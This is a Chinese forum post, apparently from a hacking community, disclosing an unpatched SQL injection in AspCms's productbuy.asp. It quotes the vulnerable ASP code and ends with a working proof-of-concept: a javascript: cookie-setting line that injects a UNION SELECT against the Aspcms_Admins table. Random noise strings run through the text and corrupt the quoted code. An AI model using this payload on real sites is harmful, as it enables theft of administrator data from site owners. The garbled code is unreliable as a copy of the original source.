好久没上土司了,上来一看发现在删号名单内.....% _9 G( F0 K4 \2 `- F$ |4 O
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
5 R6 t4 K# {9 ~! B0 {: B! T废话不多说,看代码:& p d1 j9 q+ R% N
* }' v) W2 u# {<%
6 h4 b! d0 I( z7 G, R- x
4 X6 K2 Y$ z$ q7 U# h3 N' tif action = "buy" then U9 O! a5 R) m; y8 @
: V: h- s0 M6 j; v8 {! L1 T1 S
addOrder()$ c# @& C; H9 e( P6 s2 |. H
% b; i/ x% E0 ]+ Q# o# h
else
: S) N+ @5 d) y0 d& ?4 P2 ?5 ^2 y. O% f+ g
echoContent()
+ V2 W' l& i# d7 r( l- N% M" G v. R- j, \
end if
( } i: L* a" [ F M- t
% t) {# T2 u! y1 {/ t9 U1 \% r/ K% H- D
* A9 l- D1 G [, e3 H, S8 B
……略过
# s! d1 B' q! c6 C1 m% z D- W' r8 e' {
# x6 i j5 W! U7 s# s
4 t6 d4 c, Y5 U2 [Sub echoContent()/ C5 p8 F @2 j$ g* ]& Y* o
2 t: X) R, m; d0 c+ ~( V dim id
# M! V2 p8 v3 Q9 e" `" A0 p6 R8 M% N8 U' n4 b ?
id=getForm("id","get")
0 Y. U5 d) Z3 e" w8 v0 U; j& l3 L+ ]4 n6 ?+ Z0 E8 ^
1 S) v, s4 ^* h4 L. g, e
T( P; x2 X4 M7 q c( R0 B2 F if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 2 `& C* s: T/ Y' _% w( ]* U
) B5 h, c, e( f2 X: X% G
4 |9 _; U, k4 ^
$ |, X; V/ ~; S7 i2 B dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")' p6 X# V: n' U' p, `% t2 g
4 w2 f! x* A/ a2 n
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
! N0 }) ]3 ]6 e& ~) u7 W2 r
, L- c, T, r: @' u% J2 _ Dim templatePath,tempStr
2 B" Y- L9 ^. y4 E4 L$ x
+ G4 T: {5 b: ^, J0 e. ^ templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"2 |# p( y1 P% }! X2 z1 Q3 ]
* _) M4 a' g# k, f1 w3 C
+ W! |4 Y9 w4 l4 h- J7 X+ h* Q! _$ N0 }2 C! m
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
9 B8 G4 f" O& Q9 @6 d, Y, @( `, b. a( u+ g! t+ P( o
selectproduct=rsObj(0)& x9 f' U7 h+ h; h. K% P/ t
2 c* f2 ?( v5 I! ] p+ n B% y- y* E
( F% y7 Y3 z3 }, s, l
& v) D: n9 i- q n Dim linkman,gender,phone,mobile,email,qq,address,postcode* X( l( J- q, i5 A5 D c( s
/ \' A ]0 @$ r5 z0 G- s) N if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0: R3 i# F3 p) ^. U' F
# _; W& K C" q" j+ m
if rCookie("loginstatus")=1 then
; Y( _5 ^4 A W1 O3 p( u/ K W( R5 w; F% w/ D+ ?6 ^6 y8 H
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
( F& X) \+ n+ l m8 ]* h; ^4 @" x6 X3 \* k2 U9 R
linkman=rsObj("truename")
# z3 L( o: M" @' o2 y( a3 Z* C* Z4 W" z; |5 v% B
gender=rsObj("gender")$ ? d. d% T/ o2 P+ ~- X3 Z# g% X/ |
# c' _7 ~" d& u! g
phone=rsObj("phone"), I- i% V) [: [+ V
5 N5 n, r& l, ] {* X/ S mobile=rsObj("mobile")- F3 O% \: o3 o- P/ J
- E9 `, w. w8 N! K4 ?* g) j- Y email=rsObj("email")- m' S" C% P8 p, p5 B- H9 c
4 N) h9 T# L' a6 B) R7 `9 U1 o
qq=rsObj("qq")
* u1 Z3 D5 k) s) g& X- U/ ]5 A! l; @ n$ O. [" Y8 a6 v8 V* H: w! ~4 N
address=rsObj("address")
. L( [' f( \* I- ^" ]1 K: ^4 g2 l$ _1 j
postcode=rsObj("postcode")
1 P, _; {0 O4 S0 M9 O& U# \' P4 `! Q
else
# ]$ a' _; a8 ]( S( j2 O/ S- _. A! M0 \$ f9 S6 p* }' f
gender=1+ E8 P( _% H& _6 R! n- {- |8 m
! g5 X* v6 j1 i8 Q( l9 l/ d end if* |' m- f2 R9 Z0 K9 Q6 i1 r' a
7 Z" Q! c: |6 C, T rsObj.close()
& Z+ ^% l, A& E' _2 y
& A5 K3 r/ v2 M/ |. G
# j1 w" _( c2 ^5 m l5 g$ e d8 E$ X) Z3 K1 I
with templateObj 0 v; E ^8 D1 f C6 e/ B
( p# ?8 h" R G! x& i' T/ k
.content=loadFile(templatePath)
$ w- q- R# }7 }5 E
5 ]6 {1 G+ l; c4 l. o4 G3 ` .parseHtml()
+ G: @$ O N# ~% X/ g! Q! N4 l# Y6 {
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
4 s. t" C) r, G' T$ B# z5 B2 D6 u2 ?3 b4 i
.content=replaceStr(.content,"[aspcms:linkman]",linkman) , S% Q* e* Z$ q8 e; V$ ^
; Y+ j. N4 J0 u- A5 K .content=replaceStr(.content,"[aspcms:gender]",gender)
# P. [! C( @, [2 R" I& e% z l p9 x- [1 ~5 K
.content=replaceStr(.content,"[aspcms:phone]",phone) ) b7 V; C; t* g4 z. j
. T: P' I1 n% y .content=replaceStr(.content,"[aspcms:mobile]",mobile) " h0 j/ G" m7 A" ~7 ]. e3 d
* T4 q' n& a9 I3 Y
.content=replaceStr(.content,"[aspcms:email]",email) ' p6 o1 R' k' q! V. G* Z$ L0 e
' Q6 V* X" T. f9 n5 n
.content=replaceStr(.content,"[aspcms:qq]",qq) + g M l5 S' X/ X0 j: p
, U; n& L+ v$ b: r- g .content=replaceStr(.content,"[aspcms:address]",address)
! S4 b" {, G5 x1 J; f$ ]+ p" V1 B) {& n h4 H$ M2 ?
.content=replaceStr(.content,"[aspcms:postcode]",postcode) ' p% N; }0 t/ d/ `8 p* E: r
' I, c( r; T% E% ~- n+ M .parseCommon() # c7 J8 [" v$ l6 R- R% w
/ {# m6 B" {: a! F2 f
echo .content
+ ~) m1 I b; S X; {' x5 [6 C$ ~" b
7 o* y5 F5 Q. E/ ]+ m w3 \ end with; ^# O& B' g9 D. w
7 n$ v" ?+ N0 I1 j1 b+ V* Z. x" G
set templateobj =nothing : terminateAllObjects+ B/ n2 B( T8 g9 Q
6 ?+ l7 D4 Y8 A9 A
End Sub
$ N6 g+ V& U0 j; p漏洞很明显,没啥好说的: S2 f2 v% f: v( s2 z
poc:
9 m, A& z3 i0 x. E: ]1 p2 K: E; q
+ [) h. e% B' Yjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
8 u+ v% w" ^$ N* d
: ^' `' z* ^9 p, ]( I/ S8 c* @ |